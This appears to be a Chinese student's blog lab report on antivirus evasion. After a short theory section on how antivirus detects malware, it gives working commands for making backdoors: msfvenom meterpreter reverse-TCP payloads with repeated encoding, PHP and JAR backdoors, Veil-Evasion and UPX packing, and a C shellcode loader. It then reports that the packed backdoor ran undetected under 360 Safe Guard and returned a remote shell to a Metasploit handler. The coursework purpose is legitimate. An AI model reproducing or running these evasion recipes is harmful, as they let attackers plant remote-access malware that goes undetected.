首页 > 其他分享 > Exp3-免杀原理

Exp3-免杀原理

时间:2023-03-24 18:33:16浏览次数:60  
标签:exe 免杀 Exp3 恶意代码 192.168 msfvenom 原理 veil

一、基础问题回答

1、杀软是如何检测出恶意代码的?

答:
(1)检测特征码
人有自己的特征,代码也有自己的特征。杀毒软件都有着一套特征库,依靠检索程序代码是否和库中特征码是否吻合来判断某段代码是否属于病毒。
(2)启发式恶意软件检测
如果该程序的特征和行为与病毒程序类似,其匹配程度达到一定值就可以认为该程序是病毒程序。
(3)基于行为检测
与启发式检测类似,只是单纯依靠监测程序行为来作为标准。通过监视恶意代码运行过程,如利用系统监视工具观察恶意代码运行过程时系统环境的变化,或通过跟踪恶意代码执行过程使用的系统函数和指令特征分析恶意代码功能,如出现恶意行为,则属于恶意代码。

2、免杀是做什么?

答:免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。

3、免杀的基本方法有哪些?

答:改变特征码:如果是类似exe的可执行文件可以加壳,例如压缩壳,如果是shellcode可以用encode进行编码或者用payload重新编译生成可执行文件,如果是源代码可以用其他语言进行重写再编译。
改变行为:尽量使用反弹式连接;减少对系统的修改。
非常规方法:使用社工类攻击,诱骗目标关闭AV软件;纯手工打造一个恶意软件。

4、开启杀软能绝对防止电脑中恶意代码吗?

答:开启杀软不能绝对防止电脑中恶意代码,如果杀软的病毒库中如果没有通用工具特征片段,或没有检测该恶意代码的有效手段则无法检测到该恶意代码。

二、 实践内容

1、正确使用msf编码器,使用msfvenom生成如jar之类的其他文件

1.1 得到kali的ip地址

1.2 检验直接生成的后门exe文件(实验二中的后门程序)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.113.130 PORT=1203 -f exe > 20201203backdoor.exe
用免杀测试平台测试:
测试结果如下:

1.3 使用Unicode编码一次

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai  -b '\x00' LHOST=192.168.113.130 LPORT=1203 -f exe > 20201203backdoor.exe

测试结果如下:

编码多次(此处我编码了12次)

msfvenom -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed -i -12 -b ‘\x00’ LHOST=192.168.113.130 LPORT=1203 -f exe > 20201203_backdoor2.exe

测试结果如下:

1.4利用php格式文件检测

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.113.130 LPORT=1203 x> 20201203_backdoor_php.php

1.5利用jar文件检测

msfvenom -p java/shell_reverse_tcp LHOST=192.168.113.130 LPORT=1203 -f jar > 20201203_backdoor_jar.jar

2、veil,加壳工具

2.1安装veil-evasion

sudo apt-get update
sudo apt-get install veil-evasion
cd /usr/share/veil/config
vim setup.sh

需要注意的是原安装配置文件setup.sh是从github上下载文件但是国内访问github的速度比极慢,更改setup.sh第260行的克隆地址为Sudo git clone https://gitee.com/spears/VeilDependencies.git

修改成功后,输入veil

安装相关模块

安装成功之后如果出现了找不到AutoIT文件的错误

输入指令 /usr/share/veil/config/setup.sh --force --silent

解决问题

2.2利用加壳工具产生后门软件

veil
use evasion
use c/meterpreter/rev_tcp.py
set LHOST 192.168.113.130
set LPORT 1203
generate

输入文件名字

20201203veil

生成的文件的路径为/var/lib/veil/output/compiled/20201203veil.exe

检测结果为

2.3 免杀加壳尝试

upx 20201203veil.exe -o 20201203_veil_upx.exe

3、使用C + shellcode编程

使用msfvenom 得到shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.113.130 LPORT=1203 -f c

编辑C文件 vim shellcode_c.c,输入上方的代码以及
int main()
{  
    int (*func)() =(int(*)())buf;
    func();
}

编译成可执行文件

i686-w64-mingw32-g++ shellcode_c.c -o shellcode_c.exe

4.通过组合应用各种技术实现恶意代码免杀

利用python+aes_encrypt
veil
use evasion
list
use python/shellcode_inject/aes_encrypt.py
generate
2

原理:使用了数据加密的方式进行多次编译后门软件

三、附加题:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

用Windows主机做测试,杀毒软件为360安全卫士,版本为12.0.0.2004,前面生成的后门程序20201203_veil_upx.exe不会被杀毒软件查杀。阻止区中均没有上述软件,并且我并未执行添加到信任区的操作,也没有报警信息。说明可以直接运行.

我们回到kali中打开msf控制台,进行配置
use exploit/multi/handler		
set payload windows/meterpreter/reverse_tcp		
set LHOST 192.168.113.130			
set LPORT 1203
exploit
然后再windows中执行20201203_veil_upx.exe。成功回连,获取到Windows的shell,并尝试执行了dir命令。

四、实验总结与体会

在进行本次实验的过程中,我遇到的最大的困难是加壳工具veil的安装,在安装加壳工具的时候setup.sh的路径找不到,安装的速度慢,安装结束后,不能找到python3.4的文件,不能找到AutoIT文件,也遇到过Wine32出现问题,于是在网上寻找资料,在一次又一次的恢复kali快照之后解决了问题。其他的就一帆风顺。

标签:exe,免杀,Exp3,恶意代码,192.168,msfvenom,原理,veil
From: https://www.cnblogs.com/1314liyang/p/17251362.html

相关文章

  • golang pprof 监控系列(1) —— go trace 统计原理与使用
    golangpprof监控系列(1)——gotrace统计原理与使用服务监控系列文章服务监控系列视频关于gotooltrace的使用,网上有相当多的资料,但拿我之前初学golang的经验来......
  • session和cookie的作用原理和区别
    session和cookie的作用原理和区别session和cookie简述session一、session的概念及特点二、为什么要使用session三、session的工作原理四、session与cookies区别五......
  • Vue2响应式原理
    Vue.js基本上遵循MVVM(Model–View–ViewModel)架构模式,数据模型仅仅是普通的JavaScript对象。而当你修改它们时,视图会进行更新。本文讲解一下Vue响应式系统的底层细......
  • kafka集群原理及部署
    官方地址https://kafka.apache.org/概述Kakfa起初是由LinkedIn公司开发的一个分布式的消息系统,后成为Apache的一部分,它使用Scala编写,以可水平扩展和高吞吐率而被广泛使......
  • Bitmap、RoaringBitmap原理分析
    作者:京东科技 曹留界在人群本地化实践中我们介绍了人群ID中所有的pin的偏移量可以通过Bitmap存储,而Bitmap所占用的空间大小只与偏移量的最大值有关系。假如现在要向Bitma......
  • SG90舵机的原理和控制方式
    前言做过机器人、智能车或者玩航模的朋友应该对舵机不会陌生,这种舵机也是很常用的。舵机只是我们通俗的叫法,它的本质是一个伺服电机,也可以叫做位置(角度)伺服驱动器。一般被......
  • 网络对抗Exp2-后门原理与实践
    目录实验基础基础知识实验目标实验环境在主机上用ipconfig查看Windows11主机IP在Kali虚拟机中用sudoifconfig查看Kali虚拟机IP实验过程一、使用netcat获取主机操作Shell,启......
  • 后门原理与实践—20201229赵斌
    Exp2后门原理与实践—20201229赵斌基础问题回答例举你能想到的一个后门进入到你系统中的可能方式?在网上下载软件的时候,后门很有可能被捆绑在下载的软件当中;浏览网页......
  • 网络对抗实验二 后门原理与实践--20201313
    目录《网络对抗技术》——Exp2后门原理与实践一、实验准备1、实验要求2、后门3、常用的后门工具(ncat,...)二、实验内容1.使用netcat获取主机操作Shell,cron启动2.使用soc......
  • Vue,js Vuex工作原理图
    Vuex原理解析视频107传参带数据允许走这条线store管理......